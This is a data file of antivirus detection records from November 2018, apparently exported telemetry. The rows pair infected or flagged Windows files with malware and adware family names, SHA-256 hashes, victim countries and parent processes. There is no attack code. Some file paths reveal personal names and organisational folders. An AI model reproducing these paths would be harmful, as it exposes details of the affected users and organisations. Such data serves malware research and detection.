  Row(detection=Row(filename='updater_zip_res0301_newmm[10].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[10].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:24:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gccustomhook.exe', filepath='C:\\Program Files (x86)\\Common Files\\Adobe\\OOBE\\PDApp\\AdobeGCClient\\customhook\\gccustomhook.exe', filesize=1976000, name='W32/Sality.AT.#M1.#R1'), hash='7df7156988e9c268a1f85c84b27264a7a30011bad2576ed0d3d98249e0f4d71b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T07:07:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='\\\\\\/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T12:53:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='physiologie obstetricale ide-sfme tc.exe', filepath='\\?\\D:\\PHYSIOLOGIE OBSTETRICALE IDE-SFME TC.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='388a734e1ec41559c2578c82242cd984b2559f81e04811552762fa1d5a4a18ed', metadata=Row(cmdline=None, country='BF', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:35:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='TR/Patched.Gen.#M300.#R2947'), hash='53844938576f78005a599751ab47f36f8d39f567b7274b2d0cf638e6732dde67', metadata=Row(cmdline='-k LocalServiceNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T10:36:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0006678.exe', filepath='\\\\?\\J:\\System Volume Information\\_restore{956F9782-0BB2-43F5-A11C-7A8F8AD2E548}\\RP5\\A0006678.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='84e3d420777971a9f11a639075cd1bf3ce7c76f1f085b69ead06440021d19cd3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:22:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T23:51:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='c:\\users\\X\\desktop\\restored\\2018-11-01_21-54-35\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T20:54:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='quicktimeinstaller.exe', filepath='I:\\Flash Data Nadeem\\New\\QuickTimeInstaller.exe', filesize=41984000, name='TR/Crypt.XPACK.Gen.#M300.#R4679'), hash='034a3ffd33d920c6a6be4e0e04419c1014f26776de2d70f5e459db5d841dcdd4', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-01T19:01:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210950-33cd3102', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83947de0\\AVSCAN-20181101-210851-2C95EE32\\AVSCAN-20181101-210950-33CD3102', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:09:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='coreldraw x7 samples.exe', filepath='F:\\New folder\\Corel\\CorelDRAW X7 Samples\\CorelDRAW X7 Samples.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:17:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='professional egr remover.exe', filepath='C:\\Program Files\\Professional EGR Remover\\Professional EGR Remover.exe', filesize=8000000, name='TR/Crypt.ZPACK.Gen.#M300.#R8169'), hash='325fcfaae8403873bd8772fa2c68a7e1a4b9ba82601c29b9be4663862cbc8e6d', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:04:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cours aishc iième année bonogo.exe', filepath='D:\\COURS AISHC IIème année BONOGO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='388a734e1ec41559c2578c82242cd984b2559f81e04811552762fa1d5a4a18ed', metadata=Row(cmdline=None, country='BF', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:33:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='634846.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\634846.exe', filesize=1536000, name='TR/Crypt.TPM.Gen.#M300.#R2864'), hash='08af53c69828cc5c898e7047a1a410ce7f1b380464b7a82fcfa75e6925ba45a5', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T19:09:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7d5190f9ca83957069e474e132e4a542ba99c83302ce6b130999a2820c3c1296', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_11.10.2018-40.available\\Avira\\7D5190F9CA83957069E474E132E4A542BA99C83302CE6B130999A2820C3C1296', filesize=1920000, name='HEUR/AGEN.1034329.#M1.#R1'), hash='7d5190f9ca83957069e474e132e4a542ba99c83302ce6b130999a2820c3c1296', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T10:55:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-130637-92d75698', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8a09b7ce\\AVSCAN-20181101-130518-89A72566\\AVSCAN-20181101-130637-92D75698', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:06:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='____-----_-------_-_---_--__---_.{899edc6d-8cc8-4de9-b41b-391735d76381}', filepath='h:\\\xa0\\____-----_-------_-_---_--__---_.{899EDC6D-8CC8-4DE9-B41B-391735D76381}', filesize=8176000, name='TR/Crypt.ZPACK.Gen4.#M300.#R300831'), hash='2ce0db89d4b775188e0161f7e179dcfc40435611fe10c614752d724bde2c87ac', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:11:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003054-6f435b76', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003054-6F435B76', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:31:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215400-fead6377', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c140b373\\AVSCAN-20181101-215345-FC862F3F\\AVSCAN-20181101-215400-FEAD6377', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:54:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-200911-e64996c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9eb78d39\\AVSCAN-20181101-200823-DEB84683\\AVSCAN-20181101-200911-E64996C4', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:09:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dxad0ff.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\dxaD0FE.tmp\\dxaD0FF.tmp', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:31:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1_8_5_5.html', filepath='C:\\Users\\X\\AppData\\Local\\VirtualStore\\Program Files\\Adobe\\Audition 1.5\\help\\ja_JP\\html\\1_8_5_5.html', filesize=1620000, name='W32/Chir.B.#M1.#R1'), hash='564db0c9450b80923355494e3c95d2a39861bf92e9ba41843186ffe22b04ade8', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T15:21:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T16:35:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8544.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Name\\8544.exe', filesize=1024000, name='Adware/CsdiMonetize.vgssx.#M1.#R1'), hash='2ca558499e6b9e872f4efe36145d1a52668b8e36f4eccad678575dad8d594f64', metadata=Row(cmdline=None, country='PG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:02:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_1e767269.exe', filepath='\\\\?\\C:\\Applications\\Service_1e767269.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='printwiz.exe', filepath='\\\\SERVER-GOLD\\HOMEZ\\SUPERMARKET\\NONFOOD\\NONFOOD [SIL&DJU]\\SILMI\\MISILSS EVENT\\Corel\\CORELDRAW GRAPHICS SUITE X7\\Programs\\PrintWiz.exe', filesize=304000, name='W32/Sality.AT.#M1.#R1'), hash='9e2bf003f1bb05af1fab4360d069f7c6e5d03387236898b5bcc2a4763bd099db', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dwm.exe', parentsize=92672, timestamp='2018-11-01T14:07:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aa73ec30886d71ced6e85648aab9aa49c7b6df87ba1f46e197aa7f18a99f9353', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\AA73EC30886D71CED6E85648AAB9AA49C7B6DF87BA1F46E197AA7F18A99F9353', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='aa73ec30886d71ced6e85648aab9aa49c7b6df87ba1f46e197aa7f18a99f9353', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:09:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maffeis.exe', filepath="E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ESAMI SETTEMBRE 2017\\ASA\\domande d'esame\\maffeis.exe", filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:32:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d57606edf65c167f4b39521fcc3dacf0207b252940e529b3bf7dd774a2f0dbfb', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\D57606EDF65C167F4B39521FCC3DACF0207B252940E529B3BF7DD774A2F0DBFB', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d57606edf65c167f4b39521fcc3dacf0207b252940e529b3bf7dd774a2f0dbfb', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:01:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-205051-7ef2dd7d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_658e844d\\AVSCAN-20181101-204842-6C3EC121\\AVSCAN-20181101-205051-7EF2DD7D', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d61bd0ed1862620ee945465871e203478ab17a8d74101813737b54de14af413d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:50:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-140033-462f2528', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0a2876ae\\AVSCAN-20181101-140006-4274D13A\\AVSCAN-20181101-140033-462F2528', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:00:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='presentazione corsi in ppt.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\CORSI\\CORSI AUTOFINANZIATI\\presentazione CORSI IN PPT\\presentazione CORSI IN PPT.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:08:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_1e394c91.vir', filepath='\\\\?\\C:\\Applications\\Service_1e394c91.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155740-06c8c5bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2988324a\\AVSCAN-20181101-155423-EFE3ADD4\\AVSCAN-20181101-155740-06C8C5BB', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:57:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0064494.exe', filepath='H:\\System Volume Information\\_restore{0738878F-378D-4612-8350-34AD094C736F}\\RP257\\A0064494.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='c0c958dd6dc1ac87b061972c14e5c09a131ecdb4dcc3e8f3407eb30b25b4371a', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:29:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212315-e91cb3ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212315-E91CB3BA', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:23:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='paparan.pif', filepath='F:\\paparan\\paparan.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T07:45:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='modulo3.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\INFORMATICA\\ECDL\\Moduli 1-7\\Modulo 3\\modulo3.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:24:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122013-e8213237', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b9ac91d\\AVSCAN-20181101-121511-AE520FE6\\AVSCAN-20181101-122013-E8213237', filesize=1536000, name='HEUR/APC.Griffin.#M1.#R1'), hash='e383c97614fdc259ca29c1bd26d6c8852f3ab3fd55b5d59078d61285a5d09c3f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:20:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vsbidcgc.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\vsbiDCGC.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='steam_api.dll', filepath='\\\\terminal-04\\d\\sp games\\cs source\\bin\\steam_api.dll', filesize=64000, name='W32/Ramnit.C.#M1.#R1'), hash='eed1caac0a746523d36f9fc059b54928a76fda32c7ec79237926658a3d519053', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:27:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='attestati modelli.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\MODULI 2016-2017\\ATTESTATI MODELLI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:15:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sicurezza programmi.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\MATERIALE DIDATTICO\\SORZI PROGRAMMI\\sicurezza programmi.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:30:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='malaysia 2013a.exe', filepath='I:\\Local Disk\\maljogja\\Malaysia 2013A.exe', filesize=1536000, name='W32/Sality.AW.#M1.#R1'), hash='b6f616b8b8d7c379da50992ce2635b5e9b513e91ec3f27412793d23f872cbd2c', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\malpwt2007\\Malaysia PWT 2018I.exe', parentsize=3497984, timestamp='2018-11-01T08:39:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150136-a70a1818', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_36c54126\\AVSCAN-20181101-145905-8A15D273\\AVSCAN-20181101-150136-A70A1818', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:01:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152325-99a7b8ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152325-99A7B8EE', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:23:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2606787\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\the-forest_3431043711.exe', parentsize=2443384, timestamp='2018-11-04T21:46:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-001715-8bdb2715', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-001715-8BDB2715', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:47:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='5770801.exe', filepath='\\\\?\\C:\\Program Files\\SML\\5770801.exe', filesize=1024000, name='Adware/CsdiMonetize.ajkoe.#M1.#R1'), hash='27ed231f47ab2f749185418f33ea7c237230d8c3a1b98ccdbcd1d008af125c21', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:35:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-195352-e15de712', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-195352-E15DE712', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T18:53:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00024424', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00024424', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:51:05Z'), dt=datetime.date(2018, 11, 4)),
